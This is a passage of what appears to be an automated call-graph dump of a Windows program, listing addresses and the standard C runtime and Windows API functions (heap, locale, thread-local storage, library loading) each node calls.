925bb4 4160->4161 4162 9235ee __mtinitlocknum 66 API calls 4161->4162 4163 925bbc 4162->4163 4164 9235ee __mtinitlocknum 66 API calls 4163->4164 4165 925bc4 4164->4165 4166 9235ee __mtinitlocknum 66 API calls 4165->4166 4167 925bcc 4166->4167 4168 9235ee __mtinitlocknum 66 API calls 4167->4168 4169 925bd4 4168->4169 4170 9235ee __mtinitlocknum 66 API calls 4169->4170 4171 925bdc 4170->4171 4172 9235ee __mtinitlocknum 66 API calls 4171->4172 4173 925be4 4172->4173 4174 9235ee __mtinitlocknum 66 API calls 4173->4174 4175 925bec 4174->4175 4176 9235ee __mtinitlocknum 66 API calls 4175->4176 4177 925bf4 4176->4177 4178 9235ee __mtinitlocknum 66 API calls 4177->4178 4179 925c02 4178->4179 4180 9235ee __mtinitlocknum 66 API calls 4179->4180 4181 925c0d 4180->4181 4182 9235ee __mtinitlocknum 66 API calls 4181->4182 4183 925c18 4182->4183 4184 9235ee __mtinitlocknum 66 API calls 4183->4184 4185 925c23 4184->4185 4186 9235ee __mtinitlocknum 66 API calls 4185->4186 4187 925c2e 4186->4187 4188 9235ee __mtinitlocknum 66 API calls 4187->4188 4189 925c39 4188->4189 4190 9235ee __mtinitlocknum 66 API calls 4189->4190 4191 925c44 4190->4191 4192 9235ee __mtinitlocknum 66 API calls 4191->4192 4193 925c4f 4192->4193 4194 9235ee __mtinitlocknum 66 API calls 4193->4194 4195 925c5a 4194->4195 4196 9235ee __mtinitlocknum 66 API calls 4195->4196 4197 925c65 4196->4197 4198 9235ee __mtinitlocknum 66 API calls 4197->4198 4198->4113 4199->4085 3991 92543d 3992 921411 __amsg_exit 66 API calls 3991->3992 3993 925444 3992->3993 4200 921242 4201 921251 4200->4201 4202 921257 4200->4202 4203 921697 _abort 66 API calls 4201->4203 4206 9216bc 4202->4206 4203->4202 4205 92125c __mtinitlocknum 4207 921555 _doexit 66 API calls 4206->4207 4208 9216c7 4207->4208 4208->4205 3951 921281 3954 92283c 3951->3954 3953 921286 3953->3953 3955 922861 3954->3955 3956 92286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3954->3956 3955->3956 3957 922865 3955->3957 3956->3957 3957->3953 4209 924247 4219 9241cb 4209->4219 4212 924272 setSBCS 4213 9210cc __setmbcp_nolock 5 API calls 4212->4213 4215 92442a 4213->4215 4214 9242b6 IsValidCodePage 4214->4212 4216 9242c8 GetCPInfo 4214->4216 4216->4212 4217 9242db _abort __setmbcp_nolock 4216->4217 4226 923f0d GetCPInfo 4217->4226 4236 924144 4219->4236 4222 9241ea GetOEMCP 4224 9241fa 4222->4224 4223 924208 4223->4224 4225 92420d GetACP 4223->4225 4224->4212 4224->4214 4224->4217 4225->4224 4230 923f41 _abort 4226->4230 4235 923ff3 4226->4235 4229 9210cc __setmbcp_nolock 5 API calls 4232 92409e 4229->4232 4291 925fe2 4230->4291 4232->4217 4234 926415 ___crtLCMapStringA 101 API calls 4234->4235 4235->4229 4237 924157 4236->4237 4243 9241a4 4236->4243 4238 922345 __getptd 66 API calls 4237->4238 4239 92415c 4238->4239 4240 924184 4239->4240 4244 923e04 4239->4244 4240->4243 4259 9240a0 4240->4259 4243->4222 4243->4223 4245 923e10 __mtinitlocknum 4244->4245 4246 922345 __getptd 66 API calls 4245->4246 4247 923e15 4246->4247 4248 923e43 4247->4248 4249 923e27 4247->4249 4250 922aa0 __lock 66 API calls 4248->4250 4252 922345 __getptd 66 API calls 4249->4252 4251 923e4a 4250->4251 4275 923dc6 4251->4275 4254 923e2c 4252->4254 4257 923e3a __mtinitlocknum 4254->4257 4258 921411 __amsg_exit 66 API calls 4254->4258 4257->4240 4258->4257 4260 9240ac __mtinitlocknum 4259->4260 4261 922345 __getptd 66 API calls 4260->4261 4262 9240b1 4261->4262 4263 922aa0 __lock 66 API calls 4262->4263 4264 9240c3 4262->4264 4265 9240e1 4263->4265 4266 9240d1 __mtinitlocknum 4264->4266 4268 921411 __amsg_exit 66 API calls 4264->4268 4267 92412a 4265->4267 4270 924112 InterlockedIncrement 4265->4270 4271 9240f8 InterlockedDecrement 4265->4271 4266->4243 4287 92413b 4267->4287 4268->4266 4270->4267 4271->4270 4272 924103 4271->4272 4272->4270 4273 9235ee __mtinitlocknum 66 API calls 4272->4273 4274 924111 4273->4274 4274->4270 4276 923dca 4275->4276 4282 923dfc 4275->4282 4277 923c9e ___addlocaleref 8 API calls 4276->4277 4276->4282 4278 923ddd 4277->4278 4279 923d2d ___removelocaleref 8 API calls 4278->4279 4278->4282 4280 923de8 4279->4280 4281 923b55 ___freetlocinfo 66 API calls 4280->4281 4280->4282 4281->4282 4283 923e6e 4282->4283 4286 9229c6 LeaveCriticalSection 4283->4286 4285 923e75 4285->4254 4286->4285 4290 9229c6 LeaveCriticalSection 4287->4290 4289 924142 4289->4264 4290->4289 4292 924144 _LocaleUpdate::_LocaleUpdate 76 API calls 4291->4292 4293 925ff5 4292->4293 4301 925e28 4293->4301 4296 926415 4297 924144 _LocaleUpdate::_LocaleUpdate 76 API calls 4296->4297 4298 926428 4297->4298 4389 926070 4298->4389 4302 925e74 4301->4302 4303 925e49 GetStringTypeW 4301->4303 4305 925f5b 4302->4305 4306 925e61 4302->4306 4304 925e69 GetLastError 4303->4304 4303->4306 4304->4302 4329 926b1a GetLocaleInfoA 4305->4329 4307 925ead MultiByteToWideChar 4306->4307 4323 925f55 4306->4323 4313 925eda 4307->4313 4307->4323 4309 9210cc __setmbcp_nolock 5 API calls 4311 923fae 4309->4311 4311->4296 4312 925fac GetStringTypeA 4317 925fc7 4312->4317 4312->4323 4314 9254b5 _malloc 66 API calls 4313->4314 4318 925eef _abort __alloca_probe_16 4313->4318 4314->4318 4316 925f28 MultiByteToWideChar 4320 925f3e GetStringTypeW 4316->4320 4321 925f4f 4316->4321 4322 9235ee __mtinitlocknum 66 API calls 4317->4322 4318->4316 4318->4323 4320->4321 4325 925446 4321->4325 4322->4323 4323->4309 4326 925452 4325->4326 4327 925463 4325->4327 4326->4327 4328 9235ee __mtinitlocknum 66 API calls 4326->4328 4327->4323 4328->4327 4330 926b48 4329->4330 4331 926b4d 4329->4331 4333 9210cc __setmbcp_nolock 5 API calls 4330->4333 4360 926b04 4331->4360 4334 925f7f 4333->4334 4334->4312 4334->4323 4335 926b63 4334->4335 4336 926c2d 4335->4336 4337 926ba3 GetCPInfo 4335->4337 4341 9210cc __setmbcp_nolock 5 API calls 4336->4341 4338 926bba 4337->4338 4339 926c18 MultiByteToWideChar 4337->4339 4338->4339 4340 926bc0 GetCPInfo 4338->4340 4339->4336 4344 926bd3 _strlen 4339->4344 4340->4339 4343 926bcd 4340->4343 4342 925fa0 4341->4342 4342->4312 4342->4323 4343->4339 4343->4344 4345 9254b5 _malloc 66 API calls 4344->4345 4347 926c05 _abort __alloca_probe_16 4344->4347 4345->4347 4346 926c62 MultiByteToWideChar 4348 926c7a 4346->4348 4359 926c99 4346->4359 4347->4336 4347->4346 4350 926c81 WideCharToMultiByte 4348->4350 4351 926c9e 4348->4351 4349 925446 __freea 66 API calls 4349->4336 4350->4359 4352 926ca9 WideCharToMultiByte 4351->4352 4353 926cbd 4351->4353 4352->4353 4352->4359 4354 923730 __calloc_crt 66 API calls 4353->4354 4355 926cc5 4354->4355 4356 926cce WideCharToMultiByte 4355->4356 4355->4359 4357 926ce0 4356->4357 4356->4359 4358 9235ee __mtinitlocknum 66 API calls 4357->4358 4358->4359 4359->4349 4363 926f7a 4360->4363 4364 926f93 4363->4364 4367 926d4b 4364->4367 4368 924144 _LocaleUpdate::_LocaleUpdate 76 API calls 4367->4368 4371 926d60 4368->4371 4369 926d72 4370 922c72 __mtinitlocknum 66 API calls 4369->4370 4372 926d77 4370->4372 4371->4369 4375 926daf 4371->4375 4373 922c0a _raise 6 API calls 4372->4373 4378 926b15 4373->4378 4376 926df4 4375->4376 4379 9269e5 4375->4379 4377 922c72 __mtinitlocknum 66 API calls 4376->4377 4376->4378 4377->4378 4378->4330 4380 924144 _LocaleUpdate::_LocaleUpdate 76 API calls 4379->4380 4381 9269f9 4380->4381 4385 926a06 4381->4385 4386 926acc 4381->4386 4384 925fe2 ___crtGetStringTypeA 90 API calls 4384->4385 4385->4375 4387 924144 _LocaleUpdate::_LocaleUpdate 76 API calls 4386->4387 4388 926a2e 4387->4388 4388->4384 4390 926091 LCMapStringW 4389->4390 4391 9260ac 4389->4391 4390->4391 4392 9260b4 GetLastError 4390->4392 4393 926106 4391->4393 4394 9262aa 4391->4394 4392->4391 4395 92611f MultiByteToWideChar 4393->4395 4418 9262a1 4393->4418 4396 926b1a ___ansicp 90 API calls 4394->4396 4403 92614c 4395->4403 4395->4418 4398 9262d2 4396->4398 4397 9210cc __setmbcp_nolock 5 API calls 4399 923fce 4397->4399 4400 9263c6 LCMapStringA 4398->4400 4401 9262eb 4398->4401 4398->4418 4399->4234 4404 926322 4400->4404 4405 926b63 ___convertcp 73 API calls 4401->4405 4402 92619d MultiByteToWideChar 4406 9261b6 LCMapStringW 4402->4406 4407 926298 4402->4407 4409 9254b5 _malloc 66 API calls 4403->4409 4416 926165 __alloca_probe_16 4403->4416 4408 9263ed 4404->4408 4413 9235ee __mtinitlocknum 66 API calls 4404->4413 4410 9262fd 4405->4410 4406->4407 4412 9261d7 4406->4412 4411 925446 __freea 66 API calls 4407->4411 4417 9235ee __mtinitlocknum 66 API calls 4408->4417 4408->4418 4409->4416 4414 926307 LCMapStringA 4410->4414 4410->4418 4411->4418 4415 9261e0 4412->4415 4422 926209 4412->4422 4413->4408 4414->4404 4420 926329 4414->4420 4415->4407 4419 9261f2 LCMapStringW 4415->4419 4416->4402 4416->4418 4417->4418 4418->4397 4419->4407 4424 92633a _abort __alloca_probe_16 4420->4424 4425 9254b5 _malloc 66 API calls 4420->4425 4421 926258 LCMapStringW 4426 926292 4421->4426 4427 926270 WideCharToMultiByte 4421->4427 4423 9254b5 _malloc 66 API calls 4422->4423 4428 926224 __alloca_probe_16 4422->4428 4423->4428 4424->4404 4429 926378 LCMapStringA 4424->4429 4425->4424 4430 925446 __freea 66 API calls 4426->4430 4427->4426 4428->4407 4428->4421 4431 926394 4429->4431 4432 926398 4429->4432 4430->4407 4435 925446 __freea 66 API calls 4431->4435 4434 926b63 ___convertcp 73 API calls 4432->4434 4434->4431 4435->4404 3204 921104 3241 92264c 3204->3241 3206 921110 GetStartupInfoW 3208 921133 3206->3208 3242 92261b HeapCreate 3208->3242 3210 921183 3244 92248e GetModuleHandleW 3210->3244 3214 921194 __RTC_Initialize 3278 921dde 3214->3278 3215 9210db _fast_error_exit 66 API calls 3215->3214 3217 9211a2 3218 9211ae GetCommandLineW 3217->3218 3352 921411 3217->3352 3293 921d81 GetEnvironmentStringsW 3218->3293 3221 9211bd 3302 921cd3 GetModuleFileNameW 3221->3302 3225 9211d2 3308 921aa4 3225->3308 3226 921411 __amsg_exit 66 API calls 3226->3225 3229 9211e3 3321 9214d0 3229->3321 3230 921411 __amsg_exit 66 API calls 3230->3229 3232 9211ea 3233 921411 __amsg_exit 66 API calls 3232->3233 3234 9211f5 __wwincmdln 3232->3234 3233->3234 3327 921000 CoInitialize CreateMutexW 3234->3327 3236 921216 3237 921224 3236->3237 3341 921681 3236->3341 3359 9216ad 3237->3359 3240 921229 __mtinitlocknum 3241->3206 3243 921177 3242->3243 3243->3210 3344 9210db 3243->3344 3245 9224a2 3244->3245 3246 9224a9 3244->3246 3362 9213e1 3245->3362 3248 9224b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3246->3248 3249 922611 3246->3249 3252 9224fc TlsAlloc 3248->3252 3421 9221a8 3249->3421 3254 921189 3252->3254 3255 92254a TlsSetValue 3252->3255 3254->3214 3254->3215 3255->3254 3256 92255b 3255->3256 3366 9216cb 3256->3366 3261 92207e __encode_pointer 6 API calls 3262 92257b 3261->3262 3263 92207e __encode_pointer 6 API calls 3262->3263 3264 92258b 3263->3264 3265 92207e __encode_pointer 6 API calls 3264->3265 3266 92259b 3265->3266 3383 922924 3266->3383 3273 9220f9 __decode_pointer 6 API calls 3274 9225ef 3273->3274 3274->3249 3275 9225f6 3274->3275 3403 9221e5 3275->3403 3277 9225fe GetCurrentThreadId 3277->3254 3748 92264c 3278->3748 3280 921dea GetStartupInfoA 3281 923730 __calloc_crt 66 API calls 3280->3281 3289 921e0b 3281->3289 3282 922029 __mtinitlocknum 3282->3217 3283 921fa6 GetStdHandle 3288 921f70 3283->3288 3284 92200b SetHandleCount 3284->3282 3285 923730 __calloc_crt 66 API calls 3285->3289 3286 921fb8 GetFileType 3286->3288 3287 921ef3 3287->3282 3287->3288 3291 921f1c GetFileType 3287->3291 3292 92317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3287->3292 3288->3282 3288->3283 3288->3284 3288->3286 3290 92317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3288->3290 3289->3282 3289->3285 3289->3287 3289->3288 3290->3288 3291->3287 3292->3287 3294 921d92 3293->3294 3295 921d96 3293->3295 3294->3221 3297 9236eb __malloc_crt 66 API calls 3295->3297 3298 921db7 3297->3298 3299 921dbe FreeEnvironmentStringsW 3298->3299 3749 9237f0 3298->3749 3299->3221 3303 921d08 _wparse_cmdline 3302->3303 3304 9211c7 3303->3304 3305 921d45 3303->3305 3304->3225 3304->3226 3306 9236eb __malloc_crt 66 API calls 3305->3306 3307 921d4b _wparse_cmdline 3306->3307 3307->3304 3310 921abc _wcslen 3308->3310 3313 9211d8 3308->3313 3309 923730 __calloc_crt 66 API calls 3316 921ae0 _wcslen 3309->3316 3310->3309 3311 921b45 3312 9235ee __mtinitlocknum 66 API calls 3311->3312 3312->3313 3313->3229 3313->3230 3314 923730 __calloc_crt 66 API calls 3314->3316 3315 921b6b 3317 9235ee __mtinitlocknum 66 API calls 3315->3317 3316->3311 3316->3313 3316->3314 3316->3315 3319 921b2a 3316->3319 3753 92367c 3316->3753 3317->3313 3319->3316 3320 922ae2 __invoke_watson 10 API calls 3319->3320 3320->3319 3323 9214de __IsNonwritableInCurrentImage 3321->3323 3762 922dc3 3323->3762 3324 9214fc __initterm_e 3326 92151b __IsNonwritableInCurrentImage __initterm 3324->3326 3766 922dac 3324->3766 3326->3232 3328 921035 GetCommandLineW CommandLineToArgvW 3327->3328 3329 92101f GetLastError 3327->3329 3330 921067 3328->3330 3331 921056 PathFileExistsW 3328->3331 3329->3328 3332 92102c 3329->3332 3334 921084 LoadLibraryW 3330->3334 3331->3330 3333 92106e PathFileExistsW 3331->3333 3332->3236 3333->3330 3333->3334 3335 921091 GetProcAddress 3334->3335 3336 9210aa CloseHandle CoUninitialize 3334->3336 3337 9210a3 FreeLibrary 3335->3337 3338 9210a1 3335->3338 3339 9210c2 3336->3339 3340 9210bb LocalFree 3336->3340 3337->3336 3338->3337 3339->3236 3340->3339 3867 921555 3341->3867 3343 921692 3343->3237 3345 9210e9 3344->3345 3346 9210ee 3344->3346 3347 9218c4 __FF_MSGBANNER 66 API calls 3345->3347 3348 921719 __NMSG_WRITE 66 API calls 3346->3348 3347->3346 3349 9210f6 3348->3349 3350 921465 __mtinitlocknum 3 API calls 3349->3350 3351 921100 3350->3351 3351->3210 3353 9218c4 __FF_MSGBANNER 66 API calls 3352->3353 3354 92141b 3353->3354 3355 921719 __NMSG_WRITE 66 API calls 3354->3355 3356 921423 3355->3356 3357 9220f9 __decode_pointer 6 API calls 3356->3357 3358 9211ad 3357->3358 3358->3218 3360 921555 _doexit 66 API calls 3359->3360 3361 9216b8 3360->3361 3361->3240 3363 9213ec Sleep GetModuleHandleW 3362->3363 3364 92140a 3363->3364 3365 92140e 3363->3365 3364->3363 3364->3365 3365->3246 3432 9220f0 3366->3432 3368 9216d3 __init_pointers __initp_misc_winsig 3435 922913 3368->3435 3371 92207e __encode_pointer 6 API calls 3372 92170f 3371->3372 3373 92207e TlsGetValue 3372->3373 3374 922096 3373->3374 3375 9220b7 GetModuleHandleW 3373->3375 3374->3375 3376 9220a0 TlsGetValue 3374->3376 3377 9220d2 GetProcAddress 3375->3377 3378 9220c7 3375->3378 3382 9220ab 3376->3382 3381 9220af 3377->3381 3379 9213e1 __crt_waiting_on_module_handle 2 API calls 3378->3379 3380 9220cd 3379->3380 3380->3377 3380->3381 3381->3261 3382->3375 3382->3381 3386 92292f 3383->3386 3385 9225a8 3385->3249 3387 9220f9 TlsGetValue 3385->3387 3386->3385 3438 92317c 3386->3438 3388 922132 GetModuleHandleW 3387->3388 3389 922111 3387->3389 3391 922142 3388->3391 3392 92214d GetProcAddress 3388->3392 3389->3388 3390 92211b TlsGetValue 3389->3390 3395 922126 3390->3395 3393 9213e1 __crt_waiting_on_module_handle 2 API calls 3391->3393 3394 92212a 3392->3394 3396 922148 3393->3396 3394->3249 3397 923730 3394->3397 3395->3388 3395->3394 3396->3392 3396->3394 3400 923739 3397->3400 3399 9225d5 3399->3249 3399->3273 3400->3399 3401 923757 Sleep 3400->3401 3443 92557f 3400->3443 3402 92376c 3401->3402 3402->3399 3402->3400 3727 92264c 3403->3727 3405 9221f1 GetModuleHandleW 3406 922201 3405->3406 3407 922207 3405->3407 3408 9213e1 __crt_waiting_on_module_handle 2 API calls 3406->3408 3409 922243 3407->3409 3410 92221f GetProcAddress GetProcAddress 3407->3410 3408->3407 3411 922aa0 __lock 62 API calls 3409->3411 3410->3409 3412 922262 InterlockedIncrement 3411->3412 3728 9222ba 3412->3728 3415 922aa0 __lock 62 API calls 3416 922283 3415->3416 3731 923c9e InterlockedIncrement 3416->3731 3418 9222a1 3743 9222c3 3418->3743 3420 9222ae __mtinitlocknum 3420->3277 3422 9221b2 3421->3422 3425 9221be 3421->3425 3423 9220f9 __decode_pointer 6 API calls 3422->3423 3423->3425 3424 9221d2 TlsFree 3426 9221e0 3424->3426 3425->3424 3425->3426 3427 92298b DeleteCriticalSection 3426->3427 3428 9229a3 3426->3428 3429 9235ee __mtinitlocknum 66 API calls 3427->3429 3430 9229b5 DeleteCriticalSection 3428->3430 3431 9229c3 3428->3431 3429->3426 3430->3428 3431->3254 3433 92207e __encode_pointer 6 API calls 3432->3433 3434 9220f7 3433->3434 3434->3368 3436 92207e __encode_pointer 6 API calls 3435->3436 3437 921705 3436->3437 3437->3371 3442 92264c 3438->3442 3440 923188 InitializeCriticalSectionAndSpinCount 3441 9231cc __mtinitlocknum 3440->3441 3441->3386 3442->3440 3444 92558b __mtinitlocknum 3443->3444 3445 9255a3 3444->3445 3455 9255c2 _abort 3444->3455 3456 922c72 3445->3456 3449 925634 HeapAlloc 3449->3455 3451 9255b8 __mtinitlocknum 3451->3400 3455->3449 3455->3451 3462 922aa0 3455->3462 3469 924dc3 3455->3469 3475 92567b 3455->3475 3478 9231eb 3455->3478 3481 9222cc GetLastError 3456->3481 3458 922c77 3459 922c0a 3458->3459 3460 9220f9 __decode_pointer 6 API calls 3459->3460 3461 922c1a __invoke_watson 3460->3461 3463 922ab5 3462->3463 3464 922ac8 EnterCriticalSection 3462->3464 3523 9229dd 3463->3523 3464->3455 3466 922abb 3466->3464 3467 921411 __amsg_exit 65 API calls 3466->3467 3468 922ac7 3467->3468 3468->3464 3471 924df1 3469->3471 3470 924e8a 3474 924e93 3470->3474 3722 9249da 3470->3722 3471->3470 3471->3474 3715 92492a 3471->3715 3474->3455 3726 9229c6 LeaveCriticalSection 3475->3726 3477 925682 3477->3455 3479 9220f9 __decode_pointer 6 API calls 3478->3479 3480 9231fb 3479->3480 3480->3455 3495 922174 TlsGetValue 3481->3495 3484 922339 SetLastError 3484->3458 3485 923730 __calloc_crt 63 API calls 3486 9222f7 3485->3486 3486->3484 3487 9220f9 __decode_pointer 6 API calls 3486->3487 3488 922311 3487->3488 3489 922330 3488->3489 3490 922318 3488->3490 3500 9235ee 3489->3500 3491 9221e5 __mtinit 63 API calls 3490->3491 3493 922320 GetCurrentThreadId 3491->3493 3493->3484 3494 922336 3494->3484 3496 9221a4 3495->3496 3497 922189 3495->3497 3496->3484 3496->3485 3498 9220f9 __decode_pointer 6 API calls 3497->3498 3499 922194 TlsSetValue 3498->3499 3499->3496 3501 9235fa __mtinitlocknum 3500->3501 3503 922aa0 __lock 64 API calls 3501->3503 3509 923673 _realloc __mtinitlocknum 3501->3509 3512 923639 3501->3512 3502 92364e HeapFree 3504 923660 3502->3504 3502->3509 3507 923611 ___sbh_find_block 3503->3507 3505 922c72 __mtinitlocknum 64 API calls 3504->3505 3506 923665 GetLastError 3505->3506 3506->3509 3508 92362b 3507->3508 3513 924614 3507->3513 3519 923644 3508->3519 3509->3494 3512->3502 3512->3509 3514 924653 3513->3514 3518 9248f5 ___sbh_free_block 3513->3518 3515 92483f VirtualFree 3514->3515 3514->3518 3516 9248a3 3515->3516 3517 9248b2 VirtualFree HeapFree 3516->3517 3516->3518 3517->3518 3518->3508 3522 9229c6 LeaveCriticalSection 3519->3522 3521 92364b 3521->3512 3522->3521 3524 9229e9 __mtinitlocknum 3523->3524 3537 922a0f 3524->3537 3549 9218c4 3524->3549 3530 922a1f __mtinitlocknum 3530->3466 3532 922a40 3536 922aa0 __lock 66 API calls 3532->3536 3533 922a31 3535 922c72 __mtinitlocknum 66 API calls 3533->3535 3535->3530 3538 922a47 3536->3538 3537->3530 3595 9236eb 3537->3595 3539 922a7b 3538->3539 3540 922a4f 3538->3540 3542 9235ee __mtinitlocknum 66 API calls 3539->3542 3541 92317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3540->3541 3543 922a5a 3541->3543 3544 922a6c 3542->3544 3543->3544 3545 9235ee __mtinitlocknum 66 API calls 3543->3545 3600 922a97 3544->3600 3547 922a66 3545->3547 3548 922c72 __mtinitlocknum 66 API calls 3547->3548 3548->3544 3603 9235a3 3549->3603 3552 921719 __NMSG_WRITE 66 API calls 3554 9218f0 3552->3554 3553 9235a3 __set_error_mode 66 API calls 3557 9218d8 3553->3557 3555 921719 __NMSG_WRITE 66 API calls 3554->3555 3556 9218fa 3555->3556 3558 921719 3556->3558 3557->3552 3557->3556 3559 92172d 3558->3559 3560 9235a3 __set_error_mode 63 API calls 3559->3560 3591 921888 3559->3591 3561 92174f 3560->3561 3562 92188d GetStdHandle 3561->3562 3564 9235a3 __set_error_mode 63 API calls 3561->3564 3563 92189b _strlen 3562->3563 3562->3591 3567 9218b4 WriteFile 3563->3567 3563->3591 3565 921760 3564->3565 3565->3562 3566 921772 3565->3566 3566->3591 3609 92353b 3566->3609 3567->3591 3570 9217a8 GetModuleFileNameA 3572 9217c6 3570->3572 3577 9217e9 _strlen 3570->3577 3574 92353b _strcpy_s 63 API calls 3572->3574 3575 9217d6 3574->3575 3575->3577 3578 922ae2 __invoke_watson 10 API calls 3575->3578 3576 92182c 3634 92337c 3576->3634 3577->3576 3625 9233f0 3577->3625 3578->3577 3583 921850 3585 92337c _strcat_s 63 API calls 3583->3585 3584 922ae2 __invoke_watson 10 API calls 3584->3583 3586 921864 3585->3586 3588 921875 3586->3588 3589 922ae2 __invoke_watson 10 API calls 3586->3589 3587 922ae2 __invoke_watson 10 API calls 3587->3576 3643 923213 3588->3643 3589->3588 3592 921465 3591->3592 3681 92143a GetModuleHandleW 3592->3681 3596 9236f4 3595->3596 3598 922a2a 3596->3598 3599 92370b Sleep 3596->3599 3685 9254b5 3596->3685 3598->3532 3598->3533 3599->3596 3714 9229c6 LeaveCriticalSection 3600->3714 3602 922a9e 3602->3530 3604 9235b2 3603->3604 3605 922c72 __mtinitlocknum 66 API calls 3604->3605 3606 9218cb 3604->3606 3607 9235d5 3605->3607 3606->3553 3606->3557 3608 922c0a _raise 6 API calls 3607->3608 3608->3606 3610 923553 3609->3610 3611 92354c 3609->3611 3612 922c72 __mtinitlocknum 66 API calls 3610->3612 3611->3610 3616 923579 3611->3616 3613 923558 3612->3613 3614 922c0a _raise 6 API calls 3613->3614 3615 921794 3614->3615 3615->3570 3618 922ae2 3615->3618 3616->3615 3617 922c72 __mtinitlocknum 66 API calls 3616->3617 3617->3613 3670 925320 3618->3670 3620 922b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3621 922beb GetCurrentProcess TerminateProcess 3620->3621 3622 922bdf __invoke_watson 3620->3622 3672 9210cc 3621->3672 3622->3621 3624 9217a5 3624->3570 3630 923402 3625->3630 3626 923406 3627 921819 3626->3627 3628 922c72 __mtinitlocknum 66 API calls 3626->3628 3627->3576 3627->3587 3629 923422 3628->3629 3631 922c0a _raise 6 API calls 3629->3631 3630->3626 3630->3627 3632 92344c 3630->3632 3631->3627 3632->3627 3633 922c72 __mtinitlocknum 66 API calls 3632->3633 3633->3629 3635 923394 3634->3635 3636 92338d 3634->3636 3637 922c72 __mtinitlocknum 66 API calls 3635->3637 3636->3635 3639 9233c8 3636->3639 3642 923399 3637->3642 3638 922c0a _raise 6 API calls 3640 92183f 3638->3640 3639->3640 3641 922c72 __mtinitlocknum 66 API calls 3639->3641 3640->3583 3640->3584 3641->3642 3642->3638 3644 9220f0 _raise 6 API calls 3643->3644 3645 923223 3644->3645 3646 923236 LoadLibraryA 3645->3646 3648 9232be 3645->3648 3647 92324b GetProcAddress 3646->3647 3661 923360 3646->3661 3649 923261 3647->3649 3647->3661 3652 9220f9 __decode_pointer 6 API calls 3648->3652 3665 9232e8 3648->3665 3653 92207e __encode_pointer 6 API calls 3649->3653 3650 9220f9 __decode_pointer 6 API calls 3650->3661 3651 9220f9 __decode_pointer 6 API calls 3659 92332b 3651->3659 3655 9232db 3652->3655 3654 923267 GetProcAddress 3653->3654 3656 92207e __encode_pointer 6 API calls 3654->3656 3657 9220f9 __decode_pointer 6 API calls 3655->3657 3658 92327c GetProcAddress 3656->3658 3657->3665 3660 92207e __encode_pointer 6 API calls 3658->3660 3664 9220f9 __decode_pointer 6 API calls 3659->3664 3667 923313 3659->3667 3662 923291 GetProcAddress 3660->3662 3661->3591 3663 92207e __encode_pointer 6 API calls 3662->3663 3666 9232a6 3663->3666 3664->3667 3665->3651 3665->3667 3666->3648 3668 9232b0 GetProcAddress 3666->3668 3667->3650 3669 92207e __encode_pointer 6 API calls 3668->3669 3669->3648 3671 92532c __VEC_memzero 3670->3671 3671->3620 3673 9210d6 IsDebuggerPresent 3672->3673 3674 9210d4 3672->3674 3680 9228d2 3673->3680 3674->3624 3677 921358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3678 921375 __invoke_watson 3677->3678 3679 92137d GetCurrentProcess TerminateProcess 3677->3679 3678->3679 3679->3624 3680->3677 3682 921463 ExitProcess 3681->3682 3683 92144e GetProcAddress 3681->3683 3683->3682 3684 92145e 3683->3684 3684->3682 3686 925568 3685->3686 3695 9254c7 3685->3695 3687 9231eb _malloc 6 API calls 3686->3687 3688 92556e 3687->3688 3690 922c72 __mtinitlocknum 65 API calls 3688->3690 3689 9218c4 __FF_MSGBANNER 65 API calls 3689->3695 3701 925560 3690->3701 3692 921719 __NMSG_WRITE 65 API calls 3692->3695 3693 925524 HeapAlloc 3693->3695 3694 921465 __mtinitlocknum 3 API calls 3694->3695 3695->3689 3695->3692 3695->3693 3695->3694 3696 925554 3695->3696 3697 9231eb _malloc 6 API calls 3695->3697 3699 925559 3695->3699 3695->3701 3702 925466 3695->3702 3698 922c72 __mtinitlocknum 65 API calls 3696->3698 3697->3695 3698->3699 3700 922c72 __mtinitlocknum 65 API calls 3699->3700 3700->3701 3701->3596 3703 925472 __mtinitlocknum 3702->3703 3704 9254a3 __mtinitlocknum 3703->3704 3705 922aa0 __lock 66 API calls 3703->3705 3704->3695 3706 925488 3705->3706 3707 924dc3 ___sbh_alloc_block 5 API calls 3706->3707 3708 925493 3707->3708 3710 9254ac 3708->3710 3713 9229c6 LeaveCriticalSection 3710->3713 3712 9254b3 3712->3704 3713->3712 3714->3602 3716 924971 HeapAlloc 3715->3716 3717 92493d HeapReAlloc 3715->3717 3718 92495b 3716->3718 3720 924994 VirtualAlloc 3716->3720 3717->3718 3719 92495f 3717->3719 3718->3470 3719->3716 3720->3718 3721 9249ae HeapFree 3720->3721 3721->3718 3723 9249f1 VirtualAlloc 3722->3723 3725 924a38 3723->3725 3725->3474 3726->3477 3727->3405 3746 9229c6 LeaveCriticalSection 3728->3746 3730 92227c 3730->3415 3732 923cbf 3731->3732 3733 923cbc InterlockedIncrement 3731->3733 3734 923cc9 InterlockedIncrement 3732->3734 3735 923ccc 3732->3735 3733->3732 3734->3735 3736 923cd6 InterlockedIncrement 3735->3736 3737 923cd9 3735->3737 3736->3737 3738 923ce3 InterlockedIncrement 3737->3738 3739 923ce6 3737->3739 3738->3739 3740 923cff InterlockedIncrement 3739->3740 3741 923d0f InterlockedIncrement 3739->3741 3742 923d1a InterlockedIncrement 3739->3742 3740->3739 3741->3739 3742->3418 3747 9229c6 LeaveCriticalSection 3743->3747 3745 9222ca 3745->3420 3746->3730 3747->3745 3748->3280 3750 923808 3749->3750 3751 921dd3 3750->3751 3752 92382f __VEC_memcpy 3750->3752 3751->3299 3752->3751 3754 923694 3753->3754 3755 92368d 3753->3755 3756 922c72 __mtinitlocknum 66 API calls 3754->3756 3755->3754 3759 9236c0 3755->3759 3757 923699 3756->3757 3758 922c0a _raise 6 API calls 3757->3758 3760 9236a8 3758->3760 3759->3760 3761 922c72 __mtinitlocknum 66 API calls 3759->3761 3760->3316 3761->3757 3763 922dc9 3762->3763 3764 92207e __encode_pointer 6 API calls 3763->3764 3765 922de1 3763->3765 3764->3763 3765->3324 3769 922d70 3766->3769 3768 922db9 3768->3326 3770 922d7c __mtinitlocknum 3769->3770 3777 92147d 3770->3777 3776 922d9d __mtinitlocknum 3776->3768 3778 922aa0 __lock 66 API calls 3777->3778 3779 921484 3778->3779 3780 922c85 3779->3780 3781 9220f9 